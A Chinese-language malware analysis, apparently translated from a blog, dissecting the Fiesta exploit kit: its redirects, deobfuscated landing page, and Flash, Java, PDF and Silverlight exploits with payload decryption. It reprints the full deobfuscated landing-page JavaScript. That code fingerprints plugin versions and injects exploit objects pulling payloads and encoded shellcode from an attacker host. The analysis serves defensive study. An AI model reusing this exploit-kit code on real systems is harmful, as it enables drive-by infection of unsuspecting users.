from:http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an
在這個文章中,我將一步步介紹Fiesta Exploit Kit是如何工作的:如何重定向,攻擊感染客戶端,包含一個Flash exploit,Java exploit,PDF exploit,在最后解密他的payloads.
第一步是感染我的虛擬機,幸運的是重定向頁面仍然還在
在頁面結束前,插入了一小段代碼,有一點混淆,但是解碼很簡單:
exploit kit在znaaok.myftp.biz域名商,當時指向ip是92.63.87.16,在VirusTotal passivedns中查詢該IP,有很多相似的域名
所有域名活躍時間都非常短暫,經常輪換。
繼續分析,虛擬機的瀏覽器每個頁面都被嵌入javascript代碼:
這個案例當中,exploit是一個Flash exploit,MD5值為f77e25d5a04d8035d49a27d1b680e35d
在VirusTotal提交樣本的時候57個殺毒軟件中只有3個可以識別出。
從Fiddler的請求中可以確定下面的順序:
76:客戶端訪問頁面頁面
80:客戶端下載flash exploit
81:客戶端溢出成功后執行payload
再重新開始,當用sublime打開頁面的時候,我立刻認出這是我2013年就見過的。除了上面的一些隨機文本字符,JavaScript的混淆是一樣的:
進行反混淆的工作:
1. 搜索Decrypter字符串
2. 解密所有使用過的函數跟字符串
3. 替換所有使用的變量
4. 刪除所有被分割的字符串(如:var a = ‘from’+ ‘Char’ + ‘Code’)
5. 清理代碼(刪除未使用的變量)
6. 給變量函數易懂的命名
第一步找解密函數:
又去的是Fiesta沒有改變解密函數,只是換了key,也可以在messop()函數中看到
現在怎么從哪些混淆的代碼中解碼呢,很簡單,解密函數的的 頂部實際上是來自bonyv()函數,底部是seam9j函數,給他們換個易懂的名字。
現在可以把所有調用名字為messop()函數替換一遍:
正如你所看到的,開頭大部分聲明的變量都是全局變量。解密所有的字符串之后,我們開始替換全局變量(比如lintl變成window.document等使代碼更易讀一些),整理之后,頁面的結構更清晰了:
#!javascript
function CheckWindowsInUA() {
return (/Win64;/i.test(window.navigator.userAgent) || /x64;/i.test(window.navigator.userAgent));
}
function InjectScript(script) {
var injected_element = window.document.createElement("div");
window.document.body.appendChild(injected_element);
injected_element.innerHTML = script
}
function InjectIframe(url) {
var injected_iframe = window.document.createElement("iframe");
injected_iframe.frameBorder = '0';
injected_iframe.width = '10';
injected_iframe.height = '10';
injected_iframe.src = url;
window.document.body.appendChild(injected_iframe);
return injected_iframe
}
function isStringContainingNumber(item) {
return (typeof item == 'string' && /\d/.test(item))
}
function ExtractVersionNumbers(data) {
var double_num_regx = /[\d][\d\.\_,-]*/;
var extracted_vnumbers = isStringContainingNumber(data) ? double_num_regx.exec(data) : null;
return extracted_vnumbers ? extracted_vnumbers[0].replace(/[\.\_,-]/g, ',') : null
}
function GetTridentVersion() {
if (!/Trident\/(\d)/i.test(window.navigator.userAgent)) {
return 0
} else {
return parseInt(RegExp.$1)
}
}
function NormalizeVersionInfo(data, vlength) {
var templ_array = ['0', '0', '0', '0'];
var versioninfo = ExtractVersionNumbers(data.replace(/\s/g, '')).split(',');
for (var i = 0; i < versioninfo.length; i++) {
if (!(/\d/.test(versioninfo[i]))) {
versioninfo[i] = '0'
}
}
return versioninfo.concat(templ_array).slice(0, vlength)
}
function IsActiveXAvailable() {
return (typeof window.ActiveXObject != 'undefined');
}
function PadVersionInfo(vinfo, padding_size, prepend_padding) {
while (vinfo.length < padding_size) {
vinfo = prepend_padding ? '0' + vinfo : vinfo + '0'
}
return vinfo
}
function CreateFirstAvailableActiveXObject(obj_array) {
for (var i = 0; i < obj_array.length; i++) {
try {
var obj = new ActiveXObject(obj_array[i]);
if (obj) {
return obj
}
} catch (exc) {}
}
return null
}
function GetAdobeFlashVersion() {
try {
if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // Is it MSIE 11 or is ActiveX available
var flash_obj = CreateFirstAvailableActiveXObject("ShockwaveFlash.ShockwaveFlash");
if (flash_obj) {
var versioninfo = NormalizeVersionInfo(flash_obj.GetVariable("$version"), 4);
var padded_versioninfo = PadVersionInfo((versioninfo.slice(0, 3).join('')), 6, false);
return [padded_versioninfo, versioninfo[3]]
}
}
} catch (exc) {}
return null
}
adobeflash_version_info = GetAdobeFlashVersion();
// Adobe Flash Player CVE-2014-8439
function AdobeFlashExploit_CVE20148439() {
if (adobeflash_version_info != null && adobeflash_version_info[0] >= 120000 && adobeflash_version_info[0] <= 150000 && (adobeflash_version_info[0] != 150000 || adobeflash_version_info[1] < 189)) {
var exploit_params = "piw6lxXpfkwegJaaRh9yYgEZVLcA55HsZ68S1_F1pgbBWY2pBlgF1KzoEp2_Vrzpm4QERd5HhfMQnX2YZU87ekOFPqqWr7w5gzAQpubXJNPmHRV6MQ4Kx4z5VnkuHXgvl9TEePJvZ2GWcTfa-Jns94w-fb9PKnu1OTZaAEIEUAkkUEPodUhfqXslvZJWGXBPjofZyQo5vZ-14ChOmHzf8tWNnRVXFj_bM1kY8HoQ81LvfCZAf-nWvUZAHoR8Jb9FuniDwzmiGv2HKtvV6eef-RgXRDczxIcnw5Tna20sd09SJIY3JWo7Ujo3k3U4gna2J4c2RXhKanqwSkaRwp6rt5lz4OUl2tdtRol2OdtwaG8n0P8EouyzUGHCNKZ1ClbsunXhw6_MTUhdCeNlmxiuqk65st34XERp7FIyoC9k6c5kxtoq_6cNfk8zAZLtIO2QfKm7-H2WjB3wl1i-8PkbsSx7gF2RyVPM7oLJWtHwlbfE03JHtk04dCyQaxDzONPHfvVQcGMlvD6-1TMBctB3Zmjtj9zaa8BBaMJM7ivmOqKThtGQJLil2u8XMjH0ivihNjXoYYcMNynbkB9P7VL3wvRSbks3I6f_6FWX9xp3UrejTGFjB-dDcx4lxu0Mg6Gx1PPDG6krSynCyvyPMr_DNt3GE3lgIpchO2Md7UYHb-0zbDvGQ-mwVJ58cZbi62lXVFY2ZgpJIpLgNqiia44rAIbJIvxGCt00fTn4PTOAdRDHq9XCB1RKQ_wGohmAL5ztpg52RUaYa71LyG5yuteeu7kz2ph8BpRSsdvP3dqjRluSk224GVJdBx_PZ9Qnr4yqrYica48cyGlp6JN89Jb0v9B5r6KFtlia-K9_kfkKYReic_v6GKPVLRfC0Eq8RdX6tmckvWIdfBnxjRcM-HrL3zIL3_IL39sieJ-SS1OogSemH-2uH-2iOio3F7S6VHfaxxKB7cdR3HG-kaFqPnpmuaaw3Ip2k_F8folcYRKm9kCPYvtlSutX_bdEPBA6A2ZoE90adMKiiJusiJDriJdliGmpi5g-tRleE12-CDTTxH8hx1RECR-JuaLVgheHWPZ7c0z6dSvp2-bOaLzrTSNuEWODpVITQ3O7CNZ9C4mbg4n5ZoXeC0CIzdV75R1Sk0XG5Adwoy7GrG8ZbmvDeUDM-9O7Arh1BL1k4bm7W6-KU3zHsvhrh9yN3KU2kQb_qDYsvv3V_qVEzybFz9tZxRHHUvgmfGQWUirBU4PBbnJ1uCCBV8YrgOncBNdSjJVTHJoFjkaj0JUbJkR0f4SkGIxkwjxkUyxkdyb7wYwzAuracpjrApTQfOy13sCQWTaXHpvLRkkGxz0Uy3GSAZ2pTuIReLzpCNpRoRsr6LyF2EK1Cm-1JFzCdwMOAfz-vGbDEKFKnetJoHSgpPSz95K5ucMytnRAqJkpLL2-xsrpO4xzNTvt0l9qprz5KHep8F7dOaAvNGLpW7kvW6LTxNjIPb69bYOIDS7WVwrrbS7X2H6f5HqcZzZdOQKeCBuSCqWiM5AsVaAsMcLNM4hSIltlMvZWMTWHD4lHMTlKMTly2SlJkwlTH4LYHyDSVTtSBM5mju8To61rciGw8DpauEsb-Mh91Ib5oiFXzOenZ4Se24gJGFYNqOk58i0Wm6ePAnNNmntsEe2zE8PRH0SWZmxpIhm6eT-rV4c-QlKrOsJcDP4lqNQbuMu3_K6xb6pNkq9zwFNLrLDjgR8v-UMWNjGimNfBEtjqQsjqQsjFD4mkrbWVPaU1IQ53gG--JQrclHKyzNcRWJu1LJeSDtZRIsh4gO5GxF5KCTrGxvllxJIQCBrzMBLtxBMwIBhsZQqwZyZeOvkcZ4ZwIvCeMqtUMtxaMtWKMOOaISW7MBWNCS-WqcWYqFOyOsCv";
var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='twQHU'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='buys0=r_SET&softq='/><param name='Play' value='0'/></object>";
exploit_inject_script = exploit_inject_script.replace('r_SET', exploit_params);
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/1f247c512126d3ff04500b0f005802090150020f0301050a0452500202515409";
exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL
exploit_inject_script = exploit_inject_script.replace('twQHU', exploit_url); // Insert payload URL
InjectScript(exploit_inject_script);
}
}
AdobeFlashExploit_CVE20148439();
// Adobe Flash Player CVE-2014-0497
function AdobeFlashExploit_CVE20140497() {
if (adobeflash_version_info != null && adobeflash_version_info[0] >= 110000 && adobeflash_version_info[0] < 120000) {
var exploit_params = "Uty7aGiUrcYF-SKBlUybGiX686yCWAJYkL2tmkcj2hQ6Ter1eQxHH4Ox79uRvZ7Ysf6TNwwD9jGIyAsRUo7uhbiATr4LFUH9Y1MS2cYV7INrs7tmRr-pqrCIvFJ71qMTM19LJqkTyDecQ9pz2kCODWKrBfNdLSL-jPcqt7jVZTqSZarovw2fxsylV_kWfFZ-99AavMpGyB4jQVvpMqxz4HVRS4xQrs_asQkzKVoSK5sTWHiAWyKWCziAxkr8IEJlSFD-WI2_Z5hGBzkSv4TzqxxQH9bf6sZp_-JpgBVQvFFt3N7T3_jjeYjTIs0dNq6AnASAC68b5IVtlJ-_WoR-pQga8IoKGCdsHylRpYtNgjH0BOqEbYpzeLtCgqS15FsWc0ImzK-UB02_E4HxM1R7-JsIMhRXB6RYCUIjAq98YiW8g8-MD3T1G2C2KWdDktmYGF2O2bmsVZFJwxG-uLLbMct7YpdRVvdpCwu45rwNOLiL36ZgqgEXYaeP3j22L4LTTGCYCyged2SLY9xBCzQ3jiUtZRQa1lB61QJ0wev8JVsq18cyObjKbGxnlpeVYNDmgpIn14BUR7KyEZIvICcT_5z0f_ZTcXgixd7VYBxPRQ7CsjyWlyAFuy6-qrp6NZKjHRLEh9Jux7xAM5SPy_2DizdG5K9gcSZ0A5AIeYb6Ny3FNBtNvyXHvDz3utZ2-8N1v9s3U8ow7oN0RHGage3OOngVcDCo7n0nb-nJh-OxE7MGNfmUW5UlMe7NcuPMH96cSo43MutQlyI-kKkdVz9jky52Gc-BXc_tMw4-JwF1NnjtEZIX_qOyPQCQLotvtA79tEmtlmhtkKnINkM3QkDV3TLeFATqpribq-9iEakq177_CWt6_XMVZ5uC4b48atIZrQBF4gX_gZxjI-y6rq2evtVevNgevEsth8-hxbOl7m7zuyIeuyIwD9ETpiOAvIMBqJNazoLPrquLG6RFmIaDk6pHvWViuNqdbYKW1Glrhgh31xvrVYvyQjA9b-XA97Bn61UBPQG82kRW2k_-2kEKNKRxNLIrpGlN5b2PdqTqiCVii5UEd70JcUgVNOHHhzSOuG6ZPoeIiju7zx-OJwA75littbf00GsZ78c5diDa-pP94emjdF_5_lruCbC3IJjvCquJDXyvfKD6FikDB0_MqTz7OkR1XqoS8VDv7jrbC6H6Ox1-EfFGydRiIPZRxtsWVnEfGDCDf7IkfT1Cs-r2W5OFbEtIWeryWmPyctJf2Hhypt9-jPDZLuABT0pJx0xkTUtxO8Vy-JugWe7hhngh_XghWA0hJAYb_UHcMw-ZZ4udM4sXgPFYyX_Xh07Q1K5-aCJvSgUMMEjzQBOprdJRhPrp7h0Rz9smxHyliGKfUSpfT05UPUPsKZ5rVVcm7CH5JMawbPZ0OL6ShvwI5T1dxMkFrQdKkCTJtFeBwS7j66QXLQsI2nvMAc69QLtaDnIGg8mIBDKGBHtHgswjhKdkgs8jl4J7QYj0g4lDwbkLuZtNUklKplcRqFAAqdt9kijWHIjWDRD4D7OzLbPKDW_7O92wlYgwOaIHOaIZewIeRcO5usMSuKIY5t5YLyFuTHRHFn0uTWJJCfZBXVVooiGhznUua0bQ15OUIYHJeY3ehSGFdvOPKURnsJ65K6Jrs6WW72PSoO2PWEosNfBx2V4tE9T-QYnrVWL0MeiNF1_SmWv958ARGyeC2JEJIdKQoPJ-twLx2Z_Gp85sbPpaAsF8ez4MVeRMVe-dlYU_ivlOE9EZ0ltFp7U4lKCfJokpWfOPzXDX8Pqz_HrPVb1oxHNpWNbpWyyotBjwtQKSEvjFuqISEtOXutxfLslXDoOXDROtD_Wk1R5l1HCbVwPaVH17ObvGZrNyOxLsW-jY6olt6sI6Ae1l";
var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='xVpWi'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='talkh=P69jl&diadx='/><param name='Play' value='0'/></object>";
exploit_inject_script = exploit_inject_script.replace('P69jl', exploit_params);
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/44f7aa1e1db111d0000d510c565a065d0402560c5503015e010004015453505d";
exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL
exploit_inject_script = exploit_inject_script.replace('xVpWi', exploit_url); // Insert payload URL
InjectScript(exploit_inject_script)
}
}
AdobeFlashExploit_CVE20140497();
// Get the highest available Java version
function GetHighestJavaVersion() {
try {
var jvms = null;
var java_object_class_ids = ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"]; // Initiates the Java Deployment Toolkit
for (var clsid_i = 0; clsid_i < java_object_class_ids.length; clsid_i++) {
var java_object = window.document.createElement("object");
java_object.setAttribute("classid", java_object_class_ids[clsid_i]);
if (typeof java_object["jvms"] != 'undefined') {
jvms = java_object["jvms"];
break
}
}
if (jvms != null && jvms.getLength() != 0) {
var version = 0;
for (var jvm_i = 0; jvm_i < jvms.getLength(); jvm_i++) {
var jvm_verion_info = NormalizeVersionInfo(jvms.get(jvm_i)["version"], 4);
var c_version = parseInt(jvm_verion_info[1].concat(PadVersionInfo(jvm_verion_info[3], 2, true)), 10);
if (c_version > version) { // Check if this version is higher than the previous
version = c_version
}
}
return version
}
} catch (exc) {}
return null
}
java_version = GetHighestJavaVersion();
java_enabled = window.navigator.javaEnabled();
// Java Runtime Environment CVE-2013-2465
function JavaExploit_CVE20132465() {
if (java_enabled) {
if ((java_version && java_version > 630 && java_version < 722) || (!java_version && java_enabled)) {
var exploit_inject_script = "<applet width=10 height=10><param name='cent' value='http://znaaok.myftp.biz/ai_qkvu2/44075e88a64ef0cd574c550c025e0f000402000c010708030100520100575900;1;3@@'/><param name='jnlp_href' value='http://znaaok.myftp.biz/ai_qkvu2/49efdc53b7b51fa25e57095d5358020b040f555d50010508010d07505151540b'/></applet>";
if (java_version && java_version >= 710) { // Since 7u10 bundling has to be selected for self contained applications (https://blogs.oracle.com/talkingjavadeployment/entry/packaging_improvements_in_jdk_7)
exploit_inject_script = exploit_inject_script.replace("</applet>", "<param name='javafx_version' value='2.0+'/></applet>")
}
InjectScript(exploit_inject_script)
}
}
return
}
JavaExploit_CVE20132465();
// Java Runtime Environment CVE-2012-0507
function JavaExploit_CVE20120507() {
if ((java_version && java_version < 631) || (!java_version && java_enabled)) {
// Hex encoded string, contains non-ascii characters
var exploit_param = "aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200085b4c6c6170736b3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003";
var exploit_inject_script = "<applet archive='http://znaaok.myftp.biz/ai_qkvu2/5b76b7bdcefb3f0d5410560d550c555c0554070d5655525f005655005705035c' code='vailt' width=10 height=10><param name='ptas' value='http://znaaok.myftp.biz/ai_qkvu2/5230fd54a64ef0cd564a560b515f020c0504030b5206050f000651065356540c;1;2@@'/><param name='hamm' value='JRgN_'/></applet>";
exploit_inject_script = exploit_inject_script.replace('JRgN_', exploit_param);
InjectScript(exploit_inject_script)
}
return
}
JavaExploit_CVE20120507();
function PadNumber(number) {
return (number < 10 ? 0 : '') + number.toString()
}
function FormatVersionString(vdata) {
return (vdata[0] + '.' + vdata[1] + '.' + vdata[2] + PadNumber(vdata[3]) + PadNumber(vdata[4]))
}
function IsSpecifiedVersionSupported(obj, v_array, index, new_vnumber) {
var nversion = v_array.slice(0);
nversion[index] = new_vnumber;
return obj.IsVersionSupported(FormatVersionString(nversion))
}
function GetSilverlightVersion() {
var sl_plugin = null;
var sl_descr = null;
try {
if (GetTridentVersion() == 7 && (sl_plugin = window.navigator.plugins["Silverlight Plug-In"])) { // MSIE 11 available and Silverlight
sl_descr = sl_plugin["description"]
} else if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // MSIE 11 available and ActiveX
var sl_obj = CreateFirstAvailableActiveXObject(["AgControl.AgControl"]);
var supported_version = [1, 0, 1, 1, 1]; // Base version
var version_supported = 0;
var highest_version = [6, 2, 9, 12, 31]; // Highest version we go to
if (sl_obj && sl_obj.IsVersionSupported(FormatVersionString(supported_version))) { // Lowest version is available
// Following section bumps version numbers untill it hits one not supported
for (var i = 0; i < highest_version.length; i++) {
for (var version_num = supported_version[i] + (i == 0 ? 0 : 1); version_num <= highest_version[i]; version_num++) {
if (!IsSpecifiedVersionSupported(sl_obj, supported_version, i, version_num)) {
break
}
version_supported++;
supported_version[i] = version_num
}
}
if (version_supported) {
sl_descr = FormatVersionString(supported_version)
}
}
}
if (sl_descr) {
return NormalizeVersionInfo(sl_descr, 3).join('')
}
} catch (exc) {}
return null
}
silverlight_version = GetSilverlightVersion();
// Microsoft Silverlight CVE-2013-0074
function SilverlightExploit_CVE20130074() {
if (silverlight_version >= 4050401 && silverlight_version < 5120125) {
var exploit_inject_script = "<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='j2VIH'/><param name='initParams' value='pave=YOsTWLl1BQAASYA0CB+FyXX3/9Bhw+jo////9pMbHx9BluySTLemQW6kT6dtf2hrTfebHB8f45boso78C/eZHB8fjbKO/O2Wz/ewHB8ftPTtpqZsLsina36rH3Uf90ccHx/3IRwfH4jgTAsjGW0rT0t1F3Xg4EwnRY78OE9Ldx8PHx9IdQZN4Ewjjkf8CpQYEKlXHlaSW5cXlBef4j9sHOFcsfdrHR8fjvxtLt+zmt9rSk9I4ExfSUhI4ExbRx7Z9+ceHx+O/Ep1FEdXa1BPn2SxHmsO96YeHx+a32o84Ax5IvsdavufZPIfahJI9ywfHx+a32oU4Vzy9wweHx+O/NZHsh7Z9LuIkmxnSbMmIWrk2BkkLh8fQffgHh8f3HUfdeHgTBtJSEqW+qZEizSL94sdHx+O/GFOkkyHTeBMK5rfa22UTyOW2ZbYHJsPnx8fH5QX/H9/HG8TLt+G5vfJHR8fauee5UFupE9+axqc3wv0wOBvDx7RLtZWXrKa32sqSZJrGB0u34bn97UdHx9q557lSGvf60Fq/kEe4ZQrkUaUTiOUWw4DHFMOMx7XJtFtGybZaRcu39ZAQd0bH0mUag9JsprfauSY6EGSTIFNSeBMT478/05OTuBMU0bZHh9PSUjgTFtH2R9DSEhJmOGymt9q5HVgSeBML5IjGZJcsE9I4EwTdR9J4ErjnOcAaLf0u0lISpb6luGymt9q5ElIkmTxmOGzebSb32rmkmDhSOBMM0jgTFdBdSNGNtOW+E5ILt/stUCQGHVsd3Effh93bR9qH5Z4E6Zwii4Pp7APFLf3Sh4fH5ZYF3V6d3ofZx93ex8xH3d8H3IflngPlmgLprQ7yMinaf7w2Uj3NB4fH9ZAQdxISpb6dUtGNtOW5Zb4SC7f7LVAklAPdVuQHkhOT09PT09PT03gTDfWQNxISS7fT091Hk91HHUcSOBMB19rBleIsnUfS09JSOBMA5rfaxZI4Ew/SOBMO19BQNxJTJbhLt+G4dk2zh7ISE4uxIbh3JUbAR/dmRsJlxsBHRsJlRsZLRi1/fdGQERB3Eou1k6W/U5OTUlOpsKTvginsiHO3vebHx8fQprfanma4Gt7lFofdR9ISuBPL5rfakuUWBea32tST0tP91YfHx+JSUqUWh/gTxNGmt9qKLKNsi7PIllMS09qNLIuzybXajuyLs9PmOic9g/3feDg4E5IdR/gTBdGJtdqFeApSeBMM5jo9B0u30Lcph8PHx+a32odltd1X05PdR/gTA/cT/cXHx8fRvcoHx8f4P9ISUwu4HuUYC+UYBOUYAuW5C7fhpQgJuRrCJRoN5rpa+/m91YfHx+zaugm1ZRYD2r/REFA3H+UTyOW3JbZTxxbD2cu8lp/HEc/HCu0Lt+G5/cEHx8faucm1X5q9xxHOxCoM3QcbwNHHBuxlls7A37cs2wZI35tHTM/3tUSHt2b39x3c3ZxdB9DH1MfcB9oHx8fam1zcnBxH0N8cnsxemd6FkMxMUNxcGt6b357MXpnej8wfD98cG9mPzBGPz06TD0/PTpMPT85OT9sa35taz89PT89Okw9HzB8P2xrfm1rPz09Px/3cOTg4Ll0isDKtC6cZPXeY6eQEWqGpOn/Hx8fH0FupE9hkrtN02ERFB//xKJMX+DXg6DWMfNgx6CAql/rxUORTzTYEtFtf2hrHx8fH0AXpkTq12UnxMHJbR8fHx9IRFR8AYp0mHDjKDuW06LXAA+M9PV/mKQfHx8fHx8fH3dra28lMDBlcX5+cHQxcmZ5a28xfXZlMH52QG50aWotMC4sfih+KC96KXsrKnx5KX0qLSssL34vfCopL3wvKCp7Ly4vKiouL3wqKioqLy8qei8rLygvLC8uKisvKiouKnskKh8fHx8='/></object>";
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/2b6b367b48844f2e410e4059040d005a0254065907540759075654540604565a";
exploit_url = [exploit_url, silverlight_version].join(';'); // Insert Silverlight version numbers in URL
exploit_inject_script = exploit_inject_script.replace('j2VIH', jnv);
InjectScript(pa)
}
}
SilverlightExploit_CVE20130074();
// Microsoft Internet Explorer CVE-2013-2551
function MSIEExploit_CVE20132551() {
var fut, om;
var trident_version = GetTridentVersion();
if ( !CheckWindowsInUA() &&
( trident_version == 6 || // Trident version 6, identifies Internet Explorer 10
trident_version == 5 || // Trident version 5, identifies Internet Explorer 9
trident_version == 4)) // Trident version 4, identifies Internet Explorer 8
{
InjectIframe("http://znaaok.myftp.biz/ai_qkvu2/40319b9a99f7cc915d555f0a0e590e590406030a0d00095a010451070c505859");
}
return
}
MSIEExploit_CVE20132551();
function GetAdobePDFVersion() {
try {
// If its MSIE 11 or ActiveX Controls are available instanciate PDF object, otherwise null
var activex_obj = (GetTridentVersion() == 7 || IsActiveXAvailable()) ? CreateFirstAvailableActiveXObject(["AcroPDF.PDF", "PDF.PdfCtrl"]) : null;
var pdf_obj = window.document.createElement("object");
pdf_obj.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000"); // Initiates the 'pdf.ocx' ActiveX control
pdf_obj.setAttribute("src", '');
var version_string = null;
try {
// Get version of either one of the valid objects
version_string = (activex_obj || pdf_obj).GetVersions()
} catch (exc) {}
if (version_string) {
var version_extract = version_string.match((/=\s*[\d\.]+/g));
var version = 0;
for (var i = 0; i < version_extract.length; i++) {
var c_version = parseInt(NormalizeVersionInfo(version_extract[i], 3).join(''), 10);
if (c_version > version) {
version = c_version
}
}
return version
}
} catch (exc) {}
return null
}
adobepdf_version = GetAdobePDFVersion();
// Adobe PDF CVE-2010-0188
function AdobePDFExploit_CVE20100188() {
var triden_version = GetTridentVersion();
if (triden_version == 4 || triden_version == 5) { // Check for MSIE 8 or 9
if ((adobepdf_version >= 800 && adobepdf_version < 821) || (adobepdf_version >= 900 && adobepdf_version < 931)) {
var exploit_inject_script = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='irH3d'/></object>";
var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/6b2f2de7ba83a9dc5a0b505d055f520f0654025d0606550c035650500756040f";
exploit_url = [exploit_url, adobepdf_version].join(';'); // Insert Adobe PDF version numbers in URL
exploit_inject_script = exploit_inject_script.replace('irH3d', exploit_url);
InjectScript(exploit_inject_script);
}
}
return
}
AdobePDFExploit_CVE20100188();
看一下Fiesta使用了哪些漏洞:
Adobe Flash
CVE-2014-8439: Adobe Flash Player before 13.0.0.258 and 14.x and 15.x before 15.0.0.239 on Windows and OS X and before 11.2.202.424 on Linux, Adobe AIR before 15.0.0.293, Adobe AIR SDK before 15.0.0.302, and Adobe AIR SDK & Compiler before 15.0.0.302
CVE-2014-0497: Adobe Flash Player before 11.7.700.261 and 11.8.x through 12.0.x before 12.0.0.44 on Windows and Mac OS X, and before 11.2.202.336 on Linux
Adobe PDF
CVE-2010-0188: Adobe Reader and Acrobat 8.x before 8.2.1and 9.x before 9.3.1
Java
CVE-2012-0507: Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33
CVE-2013-2465: Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7
Silverlight
CVE-2013-0074: Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0
Microsoft Internet Explorer
CVE-2013-2551: Microsoft Internet Explorer 6 through 11
有趣的是,Fiesta exploit kit完全專注的IE瀏覽器,檢測到Adobe PDF, Adobe Flash, Java插件也只是用于IE。
通過網絡抓包可以確定虛擬機是被用的FLash exploit攻擊,通過對比URL看到使用的是CVE-2014-8439。
這個CVE最初由kafeine在Angler exploit kit中以0day的方式發現的。CVE-2014-0569 (Flash Player) integrating Exploit Kit Out-of-Band Flash Player Update for CVE-2014-8439
反編譯ActionScript代碼之后,我們找到一段腳本:
整理之后代碼:
截圖顯示的不是很完整,有一個函數沒有展示出來LoadComplete函數:
stage 2的數據追加到root/main對象中,stage 2實際上是另外一個flash文件,通過addChild函數,stage 2 flash文件將會被激活,從內存當中dump出來解密的stage 2數據,我們可以看到Flash文件的頭:
反編譯這個FLash文件獲得了大約820行的ActionScript代碼,我不打算針對這個漏洞繼續深入他是如何利用的,如果你想知道是如何利用的已經有人寫過相關文章 An interesting case of CVE-2014-8439 exploit
截圖當中的ActionScript代碼只是第一步打包加載的作用,第二步才是真正的利用漏洞獲取執行權限,為了獲得執行權限,垃圾收集器的
垃圾收集器內部有一指針指向一個ITelemetry對象,通過一個包含精心準備構造虛擬表的ITelemetry對象能夠獲得執行權限,修改虛擬表后的ITelemetry,替換了正確的ITelemetry函數,指向了我們的shellcode。
反編譯完嵌入的flash文件(第二步中)之后,我們得到了一個簡單的as腳本,發現了一個有趣的函數initialization,代碼引用目標網頁上的一個變量,然后調用了一些函數:
如果我們跟蹤seatk函數,看到了跟之前很類似的代碼,是一個字符串解密函數:
看來Fiesta把同一個加密混淆的函數用在了很多地方,函數返回解碼后的數據就是結合ROP鏈利用的shellcode。
由于這個flash漏洞(CVE-2014-8439)是剛剛發現的,POC并沒有放出來,所以我不會泄露利用的細節。
現在已經知道了Fiesta現在的使用的攻擊:
登陸頁面給使用哪個shellcode/payload提供信息 exp有打包來應對檢測 第3階段的exp顯示他是一種可以很容易置換的框架
接下來講一下針對Java 的exp
該java的exp樣本基于CVE-2013-2465
5c6c4a6a4c5adc49edabd21c0779c6e3
我們可以從登陸界面發現,‘JavaExploit_CVE20132465’ 功能,對java applet進行如嵌入。
在我們反編譯jar包之后我們可以得到一份存在一些混淆的java源碼,審查源碼我們可以發現,其中一個功能在于下載payload并執行。對java源碼進行處理后如圖片所示我們可以一份清晰的源碼。
讓我們先看函數的頂部,我們可以發現exp似乎對不同的payload提供了支持。
下載payload之后讀取前256個字節,其中包括了xor key以及payload的有效部分,我們可以在虛擬機中分析這256個字節的差異。
其中我們可以看到關鍵的java代碼在于 “Decrypt” 功能,用于payload的解碼,在還原java源碼之后,這部分函數如下圖所示:
代碼的第一部分使用兩個index把需要解密的每字節數據遞增,兩個index中key的值被交換,相加掩藏在形成為XOR運算的關鍵位置。
這個XOR解密用在整個PE數據回收中,從前面的代碼段中還可以看到payload的文件名是純數字的為當前的計算機的時間。
在將java代碼轉換成python后我們可以很容易的解碼他。
在成功解碼數據后我們可以將payload放入Fiesta,現在在payload上讓我們嘗試我們前面說過的flash exp。
可惜看起來似乎不能工作,解密后的payload的運行結果無論是Flash,adobe PDF還是Silverlight都返回錯誤。它看起來似乎不是普通的java代碼,是利用了一種基于控制執行的shellcode,并且使用不同的加密手段。我們可以從硬盤上解密出的payload看到,是不同于最初256字節的XOR塊的,payload可以傳輸任何shellcode。
現在我們需要查看exp中的shellcode,先前我們已經看過了flash exp但是停在了利用點,現在我們可以通過java exp去解密payload,那么接下來我們來看看另一種類型:adobe pdf
樣本:f4346a65ea040c1c40fac10afa9bd59d
使用peepdf分析PDF:
peepdf告訴我們有一個AcroForm和一些JavaScript。我們看一下AcroForm,就會看到調用初始化時其實用的是JavaScript,手續跟蹤object關系直到找到XFA:
下滑就找到真正的AcroForm腳本,就能找到初始化設置的(混淆的)JavaScript代碼
清理下代碼找到最后看看漏洞如何觸發的,在這段JavaScript代碼中,一個惡意的image對象被shellcode創建:
在expl_imgdata傳給image之前提取出來,可以用base64解碼,看看shellcode,在shellcode當中我們找到真正的解密函數,與之前的Java exploit完全一樣。
256字節的XOR key之前有16個(額外)個字節保存信息。shellcode中下載payload,前16個字節被用于確定實際payload的大小,這些值是XOR的。前4個字節是下12個字節XOR key。看起來是這樣子的:
解密這個payload,我們可以跳過前16字節,解密出來的數據多了25字節,25字節之后就是正常的MZ頭,我們找到了有效的PE。那么這里有什么呢?更多的信息需要把文件放在系統上,MZ頭之前的數據是文件大小,硬盤上的文件名:
通過這些信息,我們得到一個可以執行的PE文件,解密的樣本可以從這里下載:31af1a5656ce741889984e8e878c7836
